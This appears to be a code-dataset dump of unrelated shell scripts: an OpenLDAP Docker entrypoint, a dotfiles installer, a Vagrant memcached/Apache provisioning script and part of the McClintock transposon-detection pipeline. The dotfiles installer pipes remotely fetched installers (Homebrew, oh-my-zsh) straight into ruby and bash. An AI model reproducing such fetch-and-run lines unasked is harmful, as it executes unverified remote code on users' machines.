echo $outputLine >> $fullFileName
echo $outputLine
location=$(cat "$saveDir$_wordInserted" | grep -i "$currentKey" | cut -d':' -f3)
if [ "$location" = "" ]
then
outputLine="UNKNOWN $currentKey "
else
outputLine="$location "
fi
fromNode=""
toNode=""
ignoreKey=""
prevhtl=$htl
fi
prevKey=$currentKey
# repeat section of the data file
if [ $htl -gt $prevhtl ]
then
ignoreKey=$currentKey
fi
if [ "$ignoreKey" = "$currentKey" ]
then
#echo "ignored entry"
continue
fi
fromNode=$(echo $archiveLine | cut -d' ' -f1)
toNode=$(echo $archiveLine | cut -d':' -f8 | cut -d' ' -f5)
outputLine="$outputLine $fromNode $toNode $htl "
prevhtl=$htl
done < "$archiveFile-tmp"
rm "$archiveFile-tmp"
echo $outputLine >> $fullFileName
echo $outputLine
#################################################################################
done
echo "********** Experiment Complete ***************"
| true
|
cc1f0f8fa07958649a4a9a6d458ff96df7927ad8
|
Shell
|
YuanzhiBao/Notes
|
/scripts/text2pdf.sh
|
UTF-8
| 99
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
echo "input file name: $1"
f="$1"
enscript "$1" --output=- | pstopdf -o ${f%%.*}.pdf
| true
|
28c345b188ac7678b284d24851b578d1bc060f36
|
Shell
|
willmao/devops-notes
|
/softwares/ldap/server/docker-entrypoint.sh
|
UTF-8
| 1,566
| 3.6875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
OPENLDAP_BASE_DIR=/usr/local/openldap
OPENLDAP_CONF_DIR=${OPENLDAP_BASE_DIR}/slapd.d
OPENLDAP_DB_BASE_DIR=${OPENLDAP_BASE_DIR}/dbs
# databases to init
OPENLDAP_DB_NAMES=(
example
)
OPENLDAP_LOG_LEVEL=${OPENLDAP_LOG_LEVEL:-0}
OPENLDAP_USER_NAME=ldap
OPENLDAP_USER_GROUP=ldap
OPENLDAP_SERVE_URLS=${OPENLDAP_SERVE_URLS:-"ldap:/// ldaps:///"}
echo "check root folder"
if [[ ! -d ${OPENLDAP_BASE_DIR} ]]; then
echo "oepnldap root folder doest not exist, please mount it into docker container"
exit -1
fi
if [[ ! -d ${OPENLDAP_CONF_DIR} ]]; then
echo "openldap config folder does not exist, auto create it"
mkdir -p ${OPENLDAP_CONF_DIR}
fi
if [[ ! -d ${OPENLDAP_DB_BASE_DIR} ]]; then
echo "openldap database base folder does not exist, auto create it"
mkdir -p ${OPENLDAP_DB_BASE_DIR}
fi
for db in "${OPENLDAP_DB_NAMES[@]}"; do
db_path=${OPENLDAP_DB_BASE_DIR}/${db}
if [[ ! -d ${db_path} ]]; then
echo "openldap database ${db} path does not exist,auto create it"
mkdir -p ${db_path}
fi
done
cd ${OPENLDAP_BASE_DIR}
if [[ -z "$(ls -A ${OPENLDAP_CONF_DIR})" ]]; then
echo "init openldap config"
slapadd -d any -n 0 -F ./slapd.d -l ./slapd.ldif
else
echo "openldap config already exist"
fi
echo "fix openldap folder permission"
chown -R ${OPENLDAP_USER_NAME}:${OPENLDAP_USER_GROUP} ${OPENLDAP_BASE_DIR}
echo "start openldap slapd service with user ${OPENLDAP_USER_NAME}"
exec slapd -F ${OPENLDAP_CONF_DIR} -u ${OPENLDAP_USER_NAME} -g ${OPENLDAP_USER_GROUP} -d ${OPENLDAP_LOG_LEVEL} -h "${OPENLDAP_SERVE_URLS}"
| true
|
4d89abd5fc8db384c4a407d9ceae614c1c875011
|
Shell
|
tomtseng/dotfiles
|
/install.sh
|
UTF-8
| 3,206
| 3.328125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
abort() {
local msg=${1}
echo ${msg}
echo "Aborting."
exit 1
}
if [ "$(uname)" == "Darwin" ]; then
os="mac"
elif [ "$(expr substr $(uname -s) 1 5)" == "Linux" ]; then # Linux
os="linux"
else
abort "Could not determine OS."
fi
#######################
# Package manager setup
#######################
if [ ${os} == "mac" ]; then
# Install brew
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
brew update
elif [ ${os} == "linux" ]; then
sudo apt --assume-yes update
sudo apt --assume-yes upgrade
fi
# Miscellaneous installations
if [ ${os} == "mac" ]; then
brew install mosh
elif [ ${os} == "linux" ]; then
sudo apt --assume-yes install mosh
fi
###########
# fzf setup
###########
git clone --depth 1 https://github.com/junegunn/fzf.git ~/.fzf
~/.fzf/install --key-bindings --completion --no-update-rc
###############
# ripgrep setup
###############
if [ ${os} == "mac" ]; then
brew install ripgrep
elif [ ${os} == "linux" ]; then
curl --location --remote-name https://github.com/BurntSushi/ripgrep/releases/download/11.0.2/ripgrep_11.0.2_amd64.deb
sudo dpkg --install ripgrep_11.0.2_amd64.deb
rm ripgrep_11.0.2_amd64.deb
fi
###########
# zsh setup
###########
if [ ${os} == "mac" ]; then
brew install zsh zsh-completions
elif [ ${os} == "linux" ]; then
sudo apt --assume-yes install zsh
fi
chsh -s $(which zsh)
RUNZSH=no bash -c "$(curl --fail --silent --show-error --location https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"
cp .zshrc ~/.zshrc
cp .oh-my-zsh/themes/* ~/.oh-my-zsh/themes/
git clone https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions
git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting
############
## Vim setup
############
# Update vim to get useful support like clipboard and clientserver
if [ ${os} == "mac" ]; then
brew install vim
elif [ ${os} == "linux" ]; then
sudo apt --assume-yes install vim-gtk
fi
cp .vimrc ~/.vimrc
mkdir -p ~/.vim/colors
cd ~/.vim/colors
curl --remote-name https://raw.githubusercontent.com/nanotech/jellybeans.vim/master/colors/jellybeans.vim
cd -
git clone https://github.com/VundleVim/Vundle.vim.git ~/.vim/bundle/Vundle.vim
vim +PluginInstall +qall
if [ ${os} == "mac" ]; then
brew install cmake macvim
cd ~/.vim/bundle/YouCompleteMe
./install.py --clang-completer
cd -
elif [ ${os} == "linux" ]; then
sudo apt --assume-yes install build-essential cmake python3-dev
cd ~/.vim/bundle/YouCompleteMe
python3 install.py --clang-completer
cd -
fi
cp -r .vim/UltiSnips ~/.vim
mkdir -p ~/.vim/bundle/YouCompleteMe/cpp
cp basic_ycm_extra_conf.py ~/.vim/bundle/YouCompleteMe/cpp/ycm_extra_conf.py
###########
# tmux setup
###########
if [ ${os} == "mac" ]; then
brew install tmux
elif [ ${os} == "linux" ]; then
sudo apt --assume-yes install tmux
fi
cp .tmux.conf ~/.tmux.conf
###########
# git setup
###########
git config --global user.name "Tom Tseng"
git config --global user.email "tom.hm.tseng@gmail.com"
git config --global core.editor "vim"
| true
|
d73067b86f06bc5df5e961b7a4ab68fb4844df73
|
Shell
|
nobukatsu/template
|
/shell-script/basic.sh
|
UTF-8
| 643
| 3.96875
| 4
|
[] |
no_license
|
#!/bin/bash
ARGUMENT1=
ARGUMENT2=
ARGUMENT3=
function usage() {
echo "Usage: $0 -a <argument1> -b <argument2> -c <argument3>"
exit 1
}
while getopts ":a:b:c:h" opt; do
case $opt in
a)
ARGUMENT1=${OPTARG} ;;
b)
ARGUMENT2=${OPTARG} ;;
c)
ARGUMENT3=${OPTARG} ;;
h)
usage ;;
\?)
echo "Invalid option: -${OPTARG}" >&2
usage ;;
esac
done
[ -z "${ARGUMENT2}" ] && echo "argument2 is required." && usage
echo "Do something."
echo "argument1: ${ARGUMENT1}"
echo "argument2: ${ARGUMENT2}"
echo "argument3: ${ARGUMENT3}"
| true
|
c3e88a5986593c0d665a02772be487f87fa5ee0f
|
Shell
|
kerin/piwik-docker
|
/scripts/start.sh
|
UTF-8
| 970
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/bash
# Starts up MariaDB within the container.
# Stop on error
set -e
DATA_DIR=/data
MYSQL_LOG=$DATA_DIR/mysql.log
PIWIK_DIR=/var/lib/piwik
if [[ -e /firstrun ]]; then
source /scripts/first_run.sh
else
source /scripts/normal_run.sh
fi
# Make sure Piwik config file is symlinked from volume -> www dir
if [[ ! -L "/var/www/html/config" ]]; then
cp -R /var/www/html/config $PIWIK_DIR
rm -rf /var/www/html/config
chmod a+w $PIWIK_DIR/config
ln -s /var/lib/piwik/config /var/www/html/config
fi
wait_for_mysql_and_run_post_start_action() {
# Wait for mysql to finish starting up first.
while [[ ! -e /run/mysqld/mysqld.sock ]] ; do
inotifywait -q -e create /run/mysqld/ >> /dev/null
done
post_start_action
}
pre_start_action
wait_for_mysql_and_run_post_start_action &
echo "Starting Apache..."
service apache2 start
# Start MariaDB
echo "Starting MariaDB..."
exec /usr/bin/mysqld_safe --skip-syslog --log-error=$MYSQL_LOG
| true
|
f5e5e05465bb74b1bbcb7afddcdeb8b0c0bbcc0b
|
Shell
|
omkardhulap/VagrantWorks
|
/InfraCloud/Assessment1/files/provision.sh
|
UTF-8
| 2,684
| 3.203125
| 3
|
[] |
no_license
|
#!/bin/bash
echo "installing apache"
apt-get update >/dev/null 2>&1
apt-get install -y apache2 >/dev/null 2>&1
cp /tmp/site.conf /etc/apache2/sites-available/site.conf > /dev/null
a2ensite site.conf > /dev/null
#echo "installing apache security config"
#apt-get update >/dev/null 2>&1
#apt-get install apache2-utils >/dev/null 2>&1
#whereis htpasswd
#sudo htpasswd -b -c /etc/apache2/.htpasswd admin admin
echo "Hi, I am learning right now. I'm just an example of how to evolve provisioning with shell scripts."
service apache2 start 1>&2 > /dev/null # I lied
netstat -ap | grep apache2
echo "install memcache dependancy"
type whereis libevent
wget http://www.monkey.org/~provos/libevent-1.4.8-stable.tar.gz
tar xfz libevent-1.4.8-stable.tar.gz
cd libevent-1.4.8-stable
./configure && make && sudo make install
sudo ln -s /usr/local/lib/libevent-1.4.so.2 /usr/lib
echo "install memcache"
wget https://memcached.org/files/memcached-1.4.31.tar.gz
echo | tar -zxvf memcached-1.4.31.tar.gz
cd memcached-1.4.31
./configure && make && make test && sudo make install
echo "run memcache as demon"
memcached -d -m 4096 -u root -l 127.0.0.1 -p 11211
echo "checking memcache running"
netstat -ap | grep 11211
echo "Cron Script executed from: ${PWD}"
ls -lrt
value=$(<exercise-memcached.sh)
echo "$value"
whereis bash
PATH="$PATH":/home/vagrant
* * * * * /bin/bash ./exercise-memcached.sh
echo "checking memcache stats >>"
echo stats | nc 127.0.0.1 11211
#echo "Installing memcached stats monitoring tool"
#wget http://phpmemcacheadmin.googlecode.com/files/phpMemcachedAdmin-1.2.2-r262.tar.gz
#tar xfz phpMemcachedAdmin-1.2.2-r262.tar.gz -C /var/www/phpMemcachedAdmin
#chmod +rx *
#chmod 0777 /var/www/phpMemcachedAdmin/Config/Memcache.php
#chmod 0777 /var/www/phpMemcachedAdmin/Temp/
#chmod 0777 /var/www/phpMemcachedAdmin
#mv /home/vagrant/phpMemcachedAdmin.conf /etc/apache2/sites-enabled
#echo "I screwed-up"
pip install flask
#sudo apt-get install -y python-memcache
#sudo apt-get install -y rrdtool
#pip install 'git+git://github.com/omkardhulap/FakingMonkey/blob/master/monitoring/memcached_stats_rrd.py'
#chmod 0777 /home/vagrant/memcached_stats_rrd.py
#cp /home/vagrant/memcached_stats_rrd.py /var/www/memcached_stats_rrd.py > /dev/null
#*/1 * * * * /var/www/memcached_stats_rrd.py
#echo "I screwed-up more"
sudo apt-get update
sudo apt-get install git # no space to install git and test further
pip install 'git+git://github.com/dlrust/python-memcached-stats.git'
python -m memcached_stats 127.0.0.1 11211
echo "replace modified app.py file"
chmod 0777 /home/vagrant/app.py
cp /home/vagrant/app.py /var/www/app/app.py # yet to test modified file
service apache2 restart
| true
|
6b430c0b0e5d0b3e6ac98b38f0d2027d1a52fef4
|
Shell
|
lastnitescurry/dctm-vagrant-puppet
|
/puppet/modules/oracle/files/oracle-xe-reset-passwords.sh
|
UTF-8
| 2,203
| 3.09375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
#
# chkconfig: 2345 80 05
# description: This is a program that is responsible for taking care of
# configuring the Oracle Database 11g Express Edition and its associated
# services.
#
# processname: oracle-xe
# Red Hat or SuSE config: /etc/sysconfig/oracle-xe
# Debian or Ubuntu config: /etc/default/oracle-xe
#
# change log:
# svaggu 02/19/11 - /etc/oratab permissions are updated to 664
# svaggu 12/20/10 - apex updates.
# svaggu 07/28/10 - Creation
#
# Brian July 2015 - repurpose to reset oracle passwords
# Source fuction library
if [ -f /lib/lsb/init-functions ]
then
. /lib/lsb/init-functions
elif [ -f /etc/init.d/functions ]
then
. /etc/init.d/functions
fi
# Set path if path not set (if called from /etc/rc)
case $PATH in
"") PATH=/bin:/usr/bin:/sbin:/etc
export PATH ;;
esac
# Save LD_LIBRARY_PATH
SAVE_LLP=$LD_LIBRARY_PATH
RETVAL=0
export ORACLE_HOME=/u01/app/oracle/product/11.2.0/xe
export ORACLE_SID=XE
export ORACLE_BASE=/u01/app/oracle
export PATH=$ORACLE_HOME/bin:$PATH
LSNR=$ORACLE_HOME/bin/lsnrctl
SQLPLUS=$ORACLE_HOME/bin/sqlplus
ORACLE_OWNER=oracle
LOG="$ORACLE_HOME_LISTNER/listener.log"
if [ -z "$CHOWN" ]; then CHOWN=/bin/chown; fi
if [ -z "$CHMOD" ]; then CHMOD=/bin/chmod; fi
if [ -z "$HOSTNAME" ]; then HOSTNAME=/bin/hostname; fi
if [ -z "$NSLOOKUP" ]; then NSLOOKUP=/usr/bin/nslookup; fi
if [ -z "$GREP" ]; then GREP=/usr/bin/grep; fi
if [ ! -f "$GREP" ]; then GREP=/bin/grep; fi
if [ -z "$SED" ]; then SED=/bin/sed; fi
if [ -z "$AWK" ]; then AWK=/bin/awk; fi
if [ -z "$SU" ];then SU=/bin/su; fi
export LC_ALL=C
if [ $(id -u) != "0" ]
then
echo "You must be root user to run the configure script."
exit 1
fi
echo alter user sys identified by vagrant\; | $SU -s /bin/bash $ORACLE_OWNER -c "$SQLPLUS -s / as sysdba" > /dev/null 2>&1
echo alter user system identified by vagrant\; | $SU -s /bin/bash $ORACLE_OWNER -c "$SQLPLUS -s / as sysdba" > /dev/null 2>&1
# Enabling Remote HTTP Connection to the Database
# http://docs.oracle.com/cd/E17781_01/server.112/e18804/network.htm#ADMQS171
#echo EXEC DBMS_XDB.SETLISTENERLOCALACCESS(FALSE)\; | $SU -s /bin/bash $ORACLE_OWNER -c "$SQLPLUS -s / as sysdba" > /dev/null 2>&1
exit 0
| true
|
3c16b17148cf9f7d6b7abc9fbffd419429b2b1dd
|
Shell
|
cloud-security-research/sgx-kms
|
/makeself_installer.sh
|
UTF-8
| 1,106
| 2.90625
| 3
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
apt-get install makeself
CWD=`pwd`
cd $CWD/BarbiE
./deploy.sh
cd $CWD
BarbiE=$CWD"/BarbiE/release"
Client=$CWD"/Barbican/Client"
Server=$CWD"/Barbican/Server"
install_script=$CWD"/install.sh"
uninstall_script=$CWD"/uninstall.sh"
startup_script=$CWD"/startup.sh"
env_file=$CWD"/env.properties"
rabbit_mq_file=$CWD"/rabbit_mq.properties"
target=$CWD"/target"
mkdir $target
mkdir $target/test_scripts
mkdir $target/lib
cp -r $startup_script $target
cp -r $env_file $target
cp -r $rabbit_mq_file $target
cp -r $BarbiE/* $target/lib
cp -r $Client/sgx.py $target/test_scripts/
cp -r $Client/sgx.h $target/test_scripts/
cp -r $Client/sgx_client_wo_hw.py $target/test_scripts/
cp -r $Client/sgx_client_with_hw.py $target/test_scripts/
cp -r $Client/project_policy_mgmt.py $target/test_scripts/
cp -r $Client/__init__.py $target/test_scripts/
cp -r $Client/rabbit_mq_scripts/ $target/test_scripts/
cp -r $Server $target
cp -r $install_script $target
cp -r $uninstall_script $target
makeself --bzip2 --target "/opt/BarbiE/" $target BarbiE.bz2.run "Installer for SGX-Barbican server" ./install.sh
| true
|
6ed9b0b6a193bf94c28644de8842fa4c4c02e0b5
|
Shell
|
Gekiboy/dotfiles
|
/.cask
|
UTF-8
| 1,115
| 3.328125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Exit if not OSX
if [ "$(uname -s)" != "Darwin" ]; then
echo "Requires OSX"
exit 1
fi;
# Install Cask
brew tap caskroom/cask
function installcask() {
brew cask install "${@}" 2> /dev/null;
}
# Browsers
installcask firefox
installcask google-chrome
installcask google-chrome-canary
# Data Storage/Transfer
installcask dropbox
installcask google-drive
installcask google-photos-backup
# Misc
installcask keepassx
installcask spectacle
# Media
installcask vlc
installcask steam
installcask spotify
# Messaging
installcask slack
installcask skype
installcask google-hangouts
# Development
installcask unity
installcask iterm2
installcask synergy
installcask cyberduck
installcask dockertoolbox
installcask mysqlworkbench
installcask visual-studio-code
# Java
installcask java
################
# Post Install #
################
unset installcask;
# Add Java versions installed above to Jenv
JENV_DIR=$(brew --prefix jenv)
if [ -d "$JENV_DIR" ]; then
for d in /Library/Java/JavaVirtualMachines/*/; do
jenv add "$d/Contents/Home"
jenv rehash
done
fi
| true
|
e6293c13822a2f0aa2e2193fc01ff9b9c863578b
|
Shell
|
onovy/onovy-mass
|
/tests/run.sh
|
UTF-8
| 495
| 3.875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
DIR=$(dirname "$(readlink -f "$0")")
FAIL=0
PASS=0
for CHECK in $DIR/* ; do
if [ ! -d "$CHECK" ] ; then
continue
fi
CHECK_NAME=$(basename "$CHECK")
echo "######## $CHECK_NAME ########"
pushd "$CHECK" >/dev/null
if ./run.sh ; then
PASS=$((PASS + 1))
else
FAIL=$((FAIL + 1))
fi
popd >/dev/null
echo ""
done
echo ""
if [ "$FAIL" -eq 0 ] ; then
echo "ALL PASS!"
else
echo "!!! FAIL !!!"
exit 1
fi
| true
|
990f75b38dbb53c753d984c2a37bfb39bb6892f3
|
Shell
|
typeg/bashscripts
|
/check_process_and_run/myapp_check.sh
|
UTF-8
| 2,013
| 3.859375
| 4
|
[] |
no_license
|
#!/bin/bash -l
VAULT_HOME=/app/myapp/media/real
HOSTNAME=$(hostname -s)
DBCHECK_FILENAME=$VAULT_HOME/share/db_status.txt
if [ "$1" == "glassfish" ]; then
PROCESS_CHECK_STRING='glassfish.jar'
elif [ "$1" == "mysql" ]; then
PROCESS_CHECK_STRING='mysqld'
elif [ "$1" == "nginx" ]; then
PROCESS_CHECK_STRING='nginx:'
elif [ "$1" == "apache" ]; then
PROCESS_CHECK_STRING='httpd'
else
echo "Usage: myapp_check.sh glassfish|mysql|nginx|apache [-start|-stop|-cron]"
exit 1
fi
PROCESS_NAME=$1
LOG_MONTH=`date +%Y-%m`
LOG_TIME=`date '+%Y-%m-%d %H:%M:%S'`
if [ "$2" == "-cron" ]
then
LOG_FILE=$HOME/shell/logs/myapp_proc_${LOG_MONTH}.log
else
LOG_FILE=/dev/stdout
fi
function start_proc () {
echo "Starting" $PROCESS_NAME >> $LOG_FILE
if [ "$PROCESS_NAME" == "glassfish" ]; then
if [ $(cat $DBCHECK_FILENAME) == "ONLINE" ]; then
asadmin start-domain domain1 >> $LOG_FILE 2>&1
fi
elif [ "$PROCESS_NAME" == "mysql" ]; then
$HOME/db/mysql/startup.sh >> $LOG_FILE 2>&1
elif [ "$PROCESS_NAME" == "nginx" ]; then
$HOME/nginx/bin/nginx.sh start >> $LOG_FILE 2>&1
elif [ "$PROCESS_NAME" == "apache" ]; then
$HOME/apache/bin/apachectl start >> $LOG_FILE 2>&1
fi
}
function stop_proc () {
echo "Stopping" $PROCESS_NAME >> $LOG_FILE
if [ "$PROCESS_NAME" == "glassfish" ]; then
asadmin stop-domain domain1 >> $LOG_FILE 2>&1
elif [ "$PROCESS_NAME" == "mysql" ]; then
$HOME/db/mysql/shutdown.sh >> $LOG_FILE 2>&1
elif [ "$PROCESS_NAME" == "nginx" ]; then
$HOME/nginx/bin/nginx.sh stop >> $LOG_FILE 2>&1
elif [ "$PROCESS_NAME" == "apache" ]; then
$HOME/apache/bin/apachectl stop >> $LOG_FILE 2>&1
fi
}
if pgrep -f -u $USER $PROCESS_CHECK_STRING >/dev/null 2>&1
then
echo $LOG_TIME ":" $PROCESS_NAME "is OK" >> $LOG_FILE
if [ "$2" == "-stop" ]; then
stop_proc
fi
else
echo $LOG_TIME ":" $PROCESS_NAME "is not running" >> $LOG_FILE
if [ "$2" == "-cron" ] || [ "$2" == "-start" ]; then
start_proc
fi
fi
| true
|
b4676b20f8f1462eb4b922f7ee9b138f55f105db
|
Shell
|
klaricch/mcclintock
|
/scripts/mcclintock.sh
|
UTF-8
| 30,798
| 3.828125
| 4
|
[] |
no_license
|
#! /bin/bash -l
usage ()
{
echo "McClintock Usage"
echo "This script takes the following inputs and will run 5 different transposable element (TE) detection methods:"
echo "-r : A reference genome sequence in fasta format. [Required]"
echo "-c : The consensus sequences of the TEs for the species in fasta format. [Required]"
echo "-g : The locations of known TEs in the reference genome in GFF 3 format. This must include a unique ID"
echo " attribute for every entry. [Optional]"
echo "-t : A tab delimited file with one entry per ID in the GFF file and two columns: the first containing"
echo " the ID and the second containing the TE family it belongs to. The family should correspond to the"
echo " names of the sequences in the consensus fasta file. [Optional - required if GFF (option -g) is supplied]"
echo "-1 : The absolute path of the first fastq file from a paired end read, this should be named ending _1.fastq. [Required]"
echo "-2 : The absolute path of the second fastq file from a paired end read, this should be named ending _2.fastq. [Required]"
echo "-o : An output folder for the run. If not supplied then the reference genome name will be used. [Optional]"
echo "-b : Retain the sorted and indexed BAM file of the paired end data aligned to the reference genome."
echo "-i : If this option is specified then all sample specific intermediate files will be removed, leaving only"
echo " the overall results. The default is to leave sample specific intermediate files (may require large amounts"
echo " of disk space)"
echo "-C : This option will include the consensus TE sequences as extra chromosomes in the reference file (useful if the "
echo " organism is known to have TEs that are not present in the reference strain). [Optional: default will not include"
echo " this]"
echo "-R : This option will include the reference TE sequences as extra chromosomes in the reference file [Optional: default"
echo " will not include this]"
echo "-m : A string containing the list of software you want the pipeline to use for analysis e.g. \"-m relocate TEMP "
echo " ngs_te_mapper\" will launch only those three methods [Optional: default is to run all methods]"
echo "-p : The number of processors to use for parallel stages of the pipeline. [Optional: default = 1]"
echo "-h : Prints this help guide."
}
# Set default value for processors in case it is not supplied
processors=1
# Default behaviour is to run all methods if no option is supplied
methods="ngs_te_mapper RelocaTE TEMP RetroSeq PoPoolationTE TE-locate"
# If an output folder is not specified then default to adding no extra folder layer
outputfolder=.
# Get the options supplied to the program
while getopts ":r:c:g:t:1:2:o:p:m:hibCR" opt;
do
case $opt in
r)
inputr=$OPTARG
;;
c)
inputc=$OPTARG
;;
g)
inputg=$OPTARG
;;
t)
inputt=$OPTARG
;;
1)
input1=$OPTARG
;;
2)
input2=$OPTARG
;;
o)
outputfolder=$OPTARG
;;
p)
processors=$OPTARG
;;
m)
methods=$OPTARG
;;
C)
addconsensus=on
;;
R)
addrefcopies=on
;;
i)
remove_intermediates=on
;;
b)
save_bam=on
;;
h)
usage
exit 1
;;
\?)
echo "Unknown option: -$OPTARG"
usage
exit 1
;;
:)
echo "Missing option argument for -$OPTARG"
usage
exit 1
;;
esac
done
# Test for presence of required arguments
if [[ -z "$inputr" || -z "$inputc" || -z "$input1" || -z "$input2" ]]
then
echo "A required parameter is missing"
usage
exit 1
fi
# If a GFF file is supplied then a TE family file that links it to the fasta consensus is also needed
if [[ "$inputg" ]]
then
if [[ -z "$inputt" ]]
then
echo "If a GFF file is supplied then a TE family file that links it to the fasta consensus is also needed"
usage
exit 1
fi
fi
# Set up folder structure
printf "\nCreating directory structure...\n\n" | tee -a /dev/stderr
genome=${inputr##*/}
genome=${genome%%.*}
sample=${input1##*/}
sample=${sample%%_1.f*}
test_dir=`pwd`
if [[ ! -d $test_dir/$outputfolder/$genome ]]
then
mkdir $test_dir/$outputfolder/
mkdir $test_dir/$outputfolder/$genome/
mkdir $test_dir/$outputfolder/$genome/reference
fi
mkdir $test_dir/$outputfolder/$genome/$sample
mkdir $test_dir/$outputfolder/$genome/$sample/reads
mkdir $test_dir/$outputfolder/$genome/$sample/bam
mkdir $test_dir/$outputfolder/$genome/$sample/sam
mkdir $test_dir/$outputfolder/$genome/$sample/results
mkdir $test_dir/$outputfolder/$genome/$sample/results/qualitycontrol
mkdir $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults
# Copy input files in to sample directory
# Copy the reference fasta file to the run folder
reference_genome_file=${inputr##*/}
if [[ ! -f $test_dir/$outputfolder/$genome/reference/$reference_genome_file ]]
then
# Use script to fix the line length of reference input to 80 characters (needed for samtools index)
perl scripts/fixfastalinelength.pl $inputr 80 $test_dir/$outputfolder/$genome/reference/$reference_genome_file
fi
reference_genome=$test_dir/$outputfolder/$genome/reference/$reference_genome_file
# Copy the TE consesnus fasta file to the run folder
consensus_te_seqs_file=${inputc##*/}
if [[ ! -f $test_dir/$outputfolder/$genome/reference/$consensus_te_seqs_file ]]
then
# Use script to fix the line length of reference input to 80 characters (needed for samtools index)
perl scripts/fixfastalinelength.pl $inputc 80 $test_dir/$outputfolder/$genome/reference/$consensus_te_seqs_file
fi
consensus_te_seqs=$test_dir/$outputfolder/$genome/reference/$consensus_te_seqs_file
# Create symbolic links for fastq files to save time and space
fastq1_file=${input1##*/}
cp -s $input1 $test_dir/$outputfolder/$genome/$sample/reads/$fastq1_file
fastq1=$test_dir/$outputfolder/$genome/$sample/reads/$fastq1_file
fastq2_file=${input2##*/}
cp -s $input2 $test_dir/$outputfolder/$genome/$sample/reads/$fastq2_file
fastq2=$test_dir/$outputfolder/$genome/$sample/reads/$fastq2_file
# If a GFF is supplied then run the analysis using the GFF and TE hierarchy as input
if [[ $inputg ]]
then
# Copy the te locations file to the run folder
te_locations_file=${inputg##*/}
if [[ ! -f $test_dir/$outputfolder/$genome/reference/$te_locations_file ]]
then
# Copy the gff input via a processing step that creates standard columns and layout for rest of pipeline
grep -v '^#' $inputg | awk -F'[\t=;]' 'BEGIN {OFS = "\t"}; {printf $1"\t"$2"\t"; for(x=1;x<=NF;x++) if ($x~"ID") printf $(x+1); print "\t"$4,$5,$6,$7,$8,"ID="}' | awk -F'\t' '{print $0$3";Name="$3";Alias="$3}' > $test_dir/$outputfolder/$genome/reference/$te_locations_file
fi
te_locations=$test_dir/$outputfolder/$genome/reference/$te_locations_file
# Copy the te family file to the run folder
te_families_file=${inputt##*/}
if [[ ! -f $test_dir/$outputfolder/$genome/reference/$te_families_file ]]
then
cp -n $inputt $test_dir/$outputfolder/$genome/reference/$te_families_file
fi
te_families=$test_dir/$outputfolder/$genome/reference/$te_families_file
# Use the GFF to create input for the rest of the pipeline
if [[ ! -f $test_dir/$outputfolder/$genome/reference/"popoolationte_"$genome".fa" ]]
then
bedtools maskfasta -fi $reference_genome -fo $test_dir/$outputfolder/$genome/reference/"popoolationte_"$genome".fa" -bed $te_locations
fi
popoolationte_reference_genome=$test_dir/$outputfolder/$genome/reference/"popoolationte_"$genome".fa"
# Extract sequence of all reference TE copies if this has not already been done
# Cut first line if it begins with #
if [[ ! -f $test_dir/$outputfolder/$genome/reference/all_te_seqs.fasta ]]
then
if [[ "$addrefcopies" = "on" ]]
then
bedtools getfasta -name -fi $reference_genome -bed $te_locations -fo $test_dir/$outputfolder/$genome/reference/ref_te_seqs.fasta
te_seqs=$test_dir/$outputfolder/$genome/reference/ref_te_seqs.fasta
fi
if [[ "$addconsensus" = "on" ]]
then
cat $consensus_te_seqs $test_dir/$outputfolder/$genome/reference/ref_te_seqs.fasta > $test_dir/$outputfolder/$genome/reference/all_te_seqs2.fasta
te_seqs=$test_dir/$outputfolder/$genome/reference/all_te_seqs2.fasta
fi
# Use script to fix the line length of reference input to 80 characters (needed for samtools index)
perl scripts/fixfastalinelength.pl $te_seqs 80 $test_dir/$outputfolder/$genome/reference/all_te_seqs.fasta
# PoPoolationTE always needs the full TE sequences
bedtools getfasta -name -fi $reference_genome -bed $te_locations -fo $test_dir/$outputfolder/$genome/reference/popool_ref_te_seqs.fasta
cat $consensus_te_seqs $test_dir/$outputfolder/$genome/reference/popool_ref_te_seqs.fasta > $test_dir/$outputfolder/$genome/reference/popool_all_te_seqs_tmp.fasta
perl scripts/fixfastalinelength.pl $test_dir/$outputfolder/$genome/reference/popool_all_te_seqs_tmp.fasta 80 $test_dir/$outputfolder/$genome/reference/popool_all_te_seqs.fasta
rm $test_dir/$outputfolder/$genome/reference/popool_all_te_seqs_tmp.fasta $test_dir/$outputfolder/$genome/reference/popool_ref_te_seqs.fasta $reference_genome".fai"
fi
all_te_seqs=$test_dir/$outputfolder/$genome/reference/all_te_seqs.fasta
# Combined TE library (consensus + reference copies) used only by PoPoolationTE.
popool_te_seqs=$test_dir/$outputfolder/$genome/reference/popool_all_te_seqs.fasta
# The pipeline functions most comprehensively (i.e. dealing with insertions with no copies in the reference genome) if
# the sequences of TEs are added to the end of the genome and reflected in the annotation
if [[ ! -f $test_dir/$outputfolder/$genome/reference/full_reference.fa ]]
then
if [[ "$addconsensus" = "on" || "$addrefcopies" = "on" ]]
then
# Append the TE sequences to the genome, then rename the result after the genome.
cat $reference_genome $all_te_seqs > $test_dir/$outputfolder/$genome/reference/full_reference.fa
mv $test_dir/$outputfolder/$genome/reference/full_reference.fa $test_dir/$outputfolder/$genome/reference/$genome".fa"
fi
fi
reference_genome=$test_dir/$outputfolder/$genome/reference/$genome".fa"
# PoPoolationTE always needs the full combination reference
if [[ ! -f $test_dir/$outputfolder/$genome/reference/"popoolationte_full_"$genome".fa" ]]
then
cat $popoolationte_reference_genome $popool_te_seqs > $test_dir/$outputfolder/$genome/reference/"popoolationte_full_"$genome".fa"
fi
popoolationte_reference_genome=$test_dir/$outputfolder/$genome/reference/"popoolationte_full_"$genome".fa"
